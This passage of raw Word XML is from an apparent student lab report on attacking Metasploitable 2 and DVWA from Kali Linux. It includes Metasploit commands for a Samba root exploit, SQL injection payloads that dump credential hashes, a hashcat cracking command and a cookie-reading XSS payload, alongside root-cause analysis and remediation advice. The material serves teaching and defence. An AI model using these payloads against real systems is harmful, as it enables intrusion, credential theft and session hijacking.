          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST &lt;KALI_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id; uname -a   # -&gt; root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The root cause is the interpolation of unsanitized user input into a shell command. The impact is unauthenticated remote code execution with root privileges over the Server Message Block service. Remediation requires patching Samba, never constructing shell commands from untrusted input, and running network daemons with least privilege.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Web-Application Injection in DVWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">With the DVWA security level set to low, two prevalent web-application weaknesses were demonstrated (OWASP Foundation, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Supplying a crafted value to the user-identifier parameter altered the application’s SQL query, returning all records and ultimately the stored credential hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># retrieve stored hashes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1' UNION SELECT user, password FROM users -- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># crack the unsalted MD5 hashes offline:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A script supplied to a reflected input field executed in the browser, demonstrating that user input was returned without output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="240"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The root cause of both flaws is the incorporation of user input into SQL statements or HTML output without parameterization or encoding. The impact includes database exfiltration, credential theft, and session hijacking. Remediation requires parameterized queries, context-aware output encoding, a Content-Security-Policy header, and salted, computationally expensive password hashing such as bcrypt or Argon2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Findings and Discussion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The three demonstrated attacks, summarized in Table 2, each granted significant unauthorized access. Across the target, the recurring root causes were unpatched or backdoored software, default and weak credentials, cleartext protocols, and absent input validation and output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Summary of Demonstrated Attacks</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9336"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="000000" w:sz="4"/>
          <w:left w:val="none"/>
          <w:bottom w:val="single" w:color="000000" w:sz="4"/>
          <w:right w:val="none"/>
          <w:insideH w:val="none"/>
          <w:insideV w:val="none"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2900"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="2800"/>
        <w:gridCol w:w="1636"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Access gained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1636"/>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b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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vsftpd 2.3.4 backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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FTP (21/6200)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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Samba usermap_script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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SMB (445)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>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Root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1636"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="none"/>
              <w:bottom w:val="none"/>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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="29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DVWA SQLi and XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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HTTP (80)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>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Database and cookie theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1636"/>
            <w:tcBorders>
              <w:top w:val="none"/>
              <w:left w:val="none"/>
              <w:bottom w:val="single" w:color="000000" w:sz="4"/>
              <w:right w:val="none"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="240"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">These results map directly to established defensive practices. Organizations should patch and update continuously and obtain software from trusted, signature-verified sources; remove default accounts and enforce strong, unique credentials; disable unused services; replace cleartext protocols such as Telnet with encrypted equivalents such as SSH; validate input and encode output in web applications; and segment networks to limit service exposure (OWASP Foundation, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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A contained laboratory of Kali Linux and Metasploitable 2 provided a safe setting to practice the full assessment workflow. Reconnaissance exposed a large attack surface, and three exploits spanning different vulnerability classes each yielded substantial access. The exercise demonstrates both how readily outdated and misconfigured systems are compromised and how straightforward, disciplined defensive measures would have prevented every attack shown.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="pag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Kennedy, D., O’Gorman, J., Kearns, D., &amp; Aharoni, M. (2011). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit: The penetration tester’s guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. No Starch Press.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE. (n.d.-a). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2011-2523</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Common Vulnerabilities and Exposures. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE. (n.d.-b). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2007-2447</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Common Vulnerabilities and Exposures. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OffSec. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://www.kali.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. (2021). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP top 10:2021</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://owasp.org/Top10/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. (n.d.). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://docs.rapid7.com/metasploit/metasploitable-2/</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of Metasploitable 2 Using Kali Linux</dc:title>
  <dc:creator>APA Lab Report</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-11T23:17:32.334Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-11T23:17:32.346Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>